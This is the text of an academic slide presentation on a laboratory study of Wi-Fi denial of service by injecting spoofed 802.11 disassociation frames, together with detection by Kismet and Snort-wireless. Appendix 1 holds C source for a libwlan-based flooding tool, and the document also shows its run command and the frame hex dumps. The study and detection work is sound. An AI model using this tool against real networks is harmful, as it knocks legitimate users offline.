attacking and detection: deny of service in wireless network by injecting disassociation frames...

Attacking and Detection:Deny of Service in Wireless

Network by Injecting Disassociation Frames through

Data Link Layer

Yufei Xu, Xin Wu, Da Teng

Outline Introduction Background Simulation Design Setting Up Environment Experimental Results & Analysis Conclusion

Introduction 802.11:

a set of standards for wireless local area network (WLAN) computer communication.

concern the lowest two layers in OSI model: Data Link Layer and Physical Layer

many attacks: Man-in-The-Middle, DoS, WEP

Disassociation attack: one of DoS attack

Background

Architecture of wireless network Stations: all components that can

connect into a wireless medium in a network. All stations are equipped with wireless network interface cards.

Access points(APs): base stations for the wireless network; transmit and receive radio frequencies for wireless enabled devices to communicate with.

Background (cont) Architecture of wireless network

Basic service set (BBS): a set of all stations that can communicate with each other.

Extended service set (ESS): a set of connected BSSes.

Distribution system: connects APs in an extended service setup.

ad-hoc network: contains no access points

Background (cont)

AP

StationSTA

Distribution System (DS)

Extended Service Set (ESS)

BSS BSS

Laptop PC

Figure 1. Infrastructure Network Figure 2. ad-hoc Network

Background (cont) 802.11 in OSI Model

Application layer

Presentation layer

Session layer

Transport layer

Network layer

Data link layer

Physical layer

Physical link

OSI Model: defines a framework for implementation of networking protocols in 7 layers.

Background (cont) 802.11 in OSI Model

802.11 standards only concern the data link layer and physical layer.

Data link layer in 802.11 is subdivided in to two sublayers:

Medium Access Control (MAC): a set of rules which defines how to send data and access the wireless medium

Logical Link Control (LLC): deals with the error control, framing, and MAC addressing.

Background (cont)

Wireless Frame: 3 kinds of frames data frame management frame control frame

Framecontrol

Duration/ID

Addr1

Addr3

Addr2

Seq.control

Addr4

Framebody

FCS

Background (cont)

Denial of Service(DoS): an action or series of actions that prevents any part of a system from working in conformity to its intention.

DoS attack: makes a computer resource unavailable to its intended users. resource allocation attacks resource destruction attacks

Background (cont) Disassociation attack How does a station connects to a network?

The APs have the responsibilities to mediate all wireless traffic in the network.

A station must associate with an AP to join the network. Then it can send data to and get data from the network.

Detailed steps: The AP broadcasts its SSID to the air. A station can become aware of the wireless network by

receiving wireless frames containing such information. Once it gets the SSID from an AP, it must conduct the

authentication process with that AP prior to any upper layer authentication such as 802.1x.

Background (cont.) A station provides its identity to AP. AP may grant a station or deny it according to the

network configuration, for example, whether the station is in AP’s black list.

802.11 standards define 2 link-level types of authentication: open system, and shared key.

They are not mutual since only AP authenticates stations, but not vice versa.

Data in this process is not encrypted. The station associates (register) with the AP to get

full access to the network. It sends an Association Request to AP.

Background (cont.)

AP grants association and responds with a status code standing for success and the Association ID. Otherwise a response for failure will be sent and the procedure ends.

AP forwards frames to and from the station: the station can communicates with other devices from now on.

Association is logically similar to connecting to a wired network.

A station can only associate with 1 AP at a time, but it may re-associate with another one when connection problems occurs, or when it roams in the whole wireless network.

Background (cont.)

The state diagram of authentication and association.

What’s disassociation attack? A fake disassociation frame

is generated by attacker, sent to victim.

AP’s MAC as the source, and victim’s MAC as the destination.

Keep sending, so victim is unavailable to other devices.

It’s a kind of DoS attack.

State 1Unauthenticated,

Unassociated

State 2Authenticated,Unassociated

State 3Authenticated,

Associated

authenticationOk

association or reassociation

Ok

deauthentication

disassociation

deauthentication

Simulation design

To demonstrate the affect of disassociation attack, we design our simulations as the following.

Architecture L2: plays a role as victim which

receives disassociation frames from the attacker.

L1: serves as a normal machine which sends ping messages in order to get ICMP echo service from the victim L2.

L3: works as an IDS which monitors all traffics over the entire network.

L4: will sit outside of the network and periodically sends disassociation messages to the intended victim L2.

L2(VICTIM)

L1(TESTER)L3(DECTCTOR)

L4(ATTACKER)

Simulation design (cont.) Designed working flow

Let attacker (L4) keeps sending fake disassociation frames to victim (L2).

Evaluate victim’s availability by tester (L1) which is accessing victim’s echo service. Actually, this is done by sending ICMP packages and receiving echo responses.

Meanwhile, the IDS (L3) should detect such an attack, alarming and logging physical frames that it gets to dump files.

Change the rate at which the attacker sends disassociation frames to observe how severely the victim is affected.

Analyze dump files to evaluate how efficiently the IDS detects attacks at different attack frequencies.

Setting up environment Hardware and software configuration

Why choose Prism-based wireless network card? It is based on Intersil Prism 2.5 chipset and allows data

injection through data link layer if driven by HostAP driver. It can also be configured to operate at promiscuous mode to

monitor the traffics over the entire network.

Host OS Wireless NIC Driver Application

AP D-link DI524802.11g Router

Tester (L1) IBM Thinkpad T61 Windows Vista Home Intel Wireless WiFi Link 4965 AGN (802.11a/g/n)

Supported by Vista

Victim (L2) Asus M3NP Laptop Windows Server 2003 Standard

Netgear WG511 802.11b (Based on Prism 54 chipset)

Netgear WG511 Wireless Assistant

IDS (L3) IBM Thinkpad R50 Red Hat 9 (kernel 2.4.20-8)

SMC 2532W-B 802.11b (Based on Prism 2.5 chipset)

HostAP 0.0.4 1) Kesmet 2006.04.R12) Snort-Wireless 2.4.3-alpha04

Attacker (L4)

Toshiba Satellite M30 Laptop

Red Hat 9 (kernel 2.4.20-8)

SMC 2532W-B 802.11b (Based on Prism 2.5 chipset)

HostAP 0.0.4 1) Libwlan (API)2) A program based on it.

Setting up environment (cont.) Software installations

Constructing attacker Install Red Hat 9 with kernel 2.4.20-8 through installation CD. Copy a configuration file /usr/src/linux-2.4.20-8/configs/kernel-2.4.20-i386.config

to /usr/src/linux-2.4.20-8/.config. Download hostap-0.0.4.tar.gz and uncompress it. Edit its Makefile and hostap_cs.c, change some value to

matching this computer. Install hostap by execute make pccard & make install_pccard. Download libwlan-0.1.tar.gz and install it. Code a program based on libwlan, and compile it. This program

works as the attack tool. Constructing detector

Install OS and drivers similar to attacker (L4). Install kismet 2006 as the IDS, and configure it.

(Please refer to report for installation details)

Experimental Results And Analysis Procedures for conducting experiments:

Start Kismet first at the detector (L3) side by typing the following commands:

cd /root ifconfig wlan0 promisc kismet

The tester (L1) starts testing by ping the victim (L2) and another machine by typing:

ping 192.168.1. 103 –t ----victim’s IP ping 192.168.1.1 –t ----third party’s IP

Attacker (L4) starts attacking by running our program (for details, please refer to the appendix of source code) by following command:

./deassoci wlan0ap 00:11:95:75:23:9a 00:09:5b:83:f8:9c 00:11:95:75:23:9a

Where: the first mac is bssid of the nework. The second mac is the victim’s mac. The third mac is the spoofed mac used by the attacker

(hacker pretends real AP to send disassociation frames to victim) .

Experimental Results And Analysis (Cont.)

Procedures for conducting experiments (Cont.):

Check what happens on the tester (L1) side. When the attacking program finishes execution, we stop

Kismet. Use snort-wireless to interpret the dumped file created by

Kismet: snort –X –w –c disassociation.rule –r Kismet-01-nov-2007-1.dump

snort –X –w –r /var/log/snort/snort-99833875.dump>/root/dissassoc_rate_02.log

Repeat the above process at different rate of sending the disassociation frames.


Before attacking, we, on tester’s side, observe:

Tester, at IP: 192.168.1.101, can successfully ping both third party (above) and the victim (below).


When we send the disassociation frames at rate 5 frames/second, we, on tester’s side observe:

Tester, at IP: 192.168.1.101, is still able to ping the third party (above). However, it can’t ping the victim at 192.168.1.103 (indicated as the following):


Furthermore, when we send the disassociation frames at 1frame/second and 1frame/10seconds respectively, they have no affect on tester pinging third party, but do affect pinging victim.

The former one refers to rate of 1frame/second while the later regards

to the of 1frame/10seconds.


On the other hand, Kismet, as an IDS, has the following display at rate of 5fames/second.

It explicitly alarms that there is a “de-authentication/disassociation” flood on 00:00:00:00:00:00.

MAC 00:00:00:00:00:00 here means a network BSSID.


Regarding to sending disassociation frames at rate 1frame/second, Kismet displays:

In this situation, Kismet reports a suspicious disassociation frame from MAC: 00:11:95:75:23:9A

MAC 00:11:95:75:23:9A here refers to source of disassociation frames.


Why Kismet generates different reports regarding to these two different situation ?

The reason is still due to the rate at which disassociation frames are sent.

At a high rate, say 5frames/second, Kismet is able to recognize such an absolutely abnormal situation and report disassociation flood happened on network 00:00:00:00:00:00.

When a relatively lower rate, for instance 1frame/second in our case (but still high compared with the normal situation), Kismet

generate an alarm questioning disassociation frames from a particular source (MAC 00:11:95:75:23:9A).


Why Kismet reports a disassociation flood on network with BSSID: 00:00:00:00:00:00 when we send disasso-ciation frames at rate 5frames/second ?

This can be answered from the actual disassociation frames we sent over the network:

0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A

0x0010: 00 00 00 00 00 00 F0 6B 05 00 The first byte “A008” means this is disassociation frame. The second byte “0201” is duration ID used to calculate

the value of NAV. The following six bytes “00095B83F89C” represents the

desti-nation’s MAC which is the victim’s MAC. The subsequent six bytes “00119575239A” stands for the

source’s MAC from which this frame is sent.


The following six bytes combination “000000000000” refers to the network’s BSSID.

The next two bytes “F06B” are used for sequence control. The last two bytes “0500” are used to represent the reason

why this disassociation frame is sent.

From the above illustration of the frame’s format, it is rational

that when Kismet reports a disassociation flood suffered by a

network, the BSSID (00:00:00:00:00:00) will be referred.


Finally, when we use “snort-wireless” to interpret the dump files created by Kismet for rate 1frame/second and 5frames/second respectively, we observe:

For rate 1frame/second, snort-wireless reports 801 such disassociation frames were captured by Kismet.

Regarding to rate 5frames/second, snort-wireless reports 720 such frames were logged by Kismet.

Consequently, from the above observation we can infer

that Kismet’s logging capability is also related to rate

at which disassociation frames are sent.

Conclusions Experimental results indicate the following conclusions:

The severity that a victim suffers from the attack is proportional to the rate at which the disassociation frames are sent. As the rate of disassociation frames increase, the victim will be more severely affected.

Kismet has the ability to report the severity of the attack based on detecting the rate at which the disassociation frames are sent.

The capturing ability of Kismet, as an IDS, is also related to rate at which the disassociation frames are sent. At a relatively high rate, Kismet can’t capture all the disassociation frames.

Appendix 1 – source code #include <libwlan.h>

int main(int argc, char *argv[]) {

int s, *len, i, j;

const char *iface = NULL; //interface referred by the established socket

struct ieee80211_mgmt mgmt; //structure for management frame defined in Libwlan

char *bssid_addr. *dst_addr, *src_addr; //refer to bssid, destination mac, source mac supplied by command line

u_char *bssid, *dst_mac, *src_mac; //store converted bssid, destination mac, sourc mac in hexadecimal

if(argc != 5) //improper input supplied by user

{

pirntf(“Usage: %s <wlan#ap> <bssid_address> <dst_address> <src_address>\n”, argv[0]);

pirntf(“Example: %s wlan0ap 00:01:23:45:0A 00:01:23:45:0A 00:02:4C:00:00\n”, argv[0]);

exit(-1); }

else{ iface = argv[1]; //store the interface

bssid_addr = argv[2]; //store the bssid

dst_addr = argv[3]; //store the destination mac

src_addr = argv[4]; } //store the source mac

s = socket_init(iface); //construct the socket for send frames

len = malloc(1);

bssid = lib_hex_aton(bssid_addr, len); //convert the bssid into hexadecimal

dst_mac = lib_hex_aton(dst_addr, len); //convert the destination mac into hexadecimal

src_mac = lib_hex_aton(src_addr, len); //convert the source mac into hexadecimal

for( j=1 ; j<= 100; j++){

for(i=1; i<=10; i++){ mgmt = build_disassoc(dst_mac, src_mac, bssid, WLAN_REASON_DISASSOC_AP_BUSY); //construct the disassociation frame

if( send (s, &mgmt, IEEE80211_HDRLEN + sizeof (mgmt.u.disassoc), 0) < 0) {

perror (“ send: ”);

sleep(1); }

//usleep (200000);

sleep (10); }

rintf(“Progression status: %.1f %%\n”, j/100.0 * 100); }

close (s);

return 0;

}

Appendix 2 – Rule for Snort-wireless

alert wifi 00:11:95:75:23:9A -> 00:09:5B:83:F8:9C (msg: “Disassociation Attack”; type: TYPE_MANAGEMENT; stype: STYPE_DISASSOC;)

Appendix 3 – Disassociation Frames 11/01-22:55:23.268612 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C

bssid: 0:0:0:0:0:0 Flags: Re 0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A ......[......u#. 0x0010: 00 00 00 00 00 00 F0 6B 05 00 .......k..=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

=+ 11/01-22:55:23.363666 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C bssid: 0:0:0:0:0:0 Flags: Re 0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A ......[......u#. 0x0010: 00 00 00 00 00 00 F0 6B 05 00 .......k..=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

+=+ 11/01-22:55:23.455478 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C bssid: 0:0:0:0:0:0 Flags: 0x0000: A0 00 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A ......[......u#. 0x0010: 00 00 00 00 00 00 00 6C 05 00 .......l..=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

+=+

Appendix 4 – Alerts by Snort-wireless [**] [1:0:0] Disassociation Attack [**] 11/01-21:06:36.936921 [**] [1:0:0] Disassociation Attack [**] 11/01-21:06:38.812559 [**] [1:0:0] Disassociation Attack [**] 11/01-21:06:38.815930 [**] [1:0:0] Disassociation Attack [**] 11/01-21:06:38.880704 [**] [1:0:0] Disassociation Attack [**] 11/01-21:06:39.822643 [**] [1:0:0] Disassociation Attack [**]

11/01-21:06:39.921190

References

[1] S. Anderson, “A Linux Wireless Access Point HOWTO” chapter 4, v0.1, 2003, June 6, [Online] Available: http://oob.freeshell.org/nzwireless/hostap.html

[2] Source Location for downloading hostap-0.0.4 driver: [Online] Available: http://hostap.epitest.fi/releases/

[3] Source Location for downloading libwlan-0.1: [Online] Available: http://wirelessexposed.blogspot.com/2007/03/hakcing-tools-at-your-disposal.html

[4] Source Location for downloading Kismet-2006-04-R1: [Online] Available: http://www.kismetwireless.net/

[5] Source Location for downloading snort-wireless-2.4.3-alpha04: [Online] Available: http://snort-wireless.org/

[6] Pablo Brenner “A Technical Tutorial on the IEEE 802.11 Protocol” 1996. Breeze.com

[7] Allison H. Scogin “Disabling a Wireless Network via Denial of Service” Technical Report MSU-070424

[8] http://www.intel.com/support/wireless/wlan/sb/CS-025325.htm

Question Period

Any Questions ?

attacking and detection: deny of service in wireless network by injecting disassociation frames...

Documents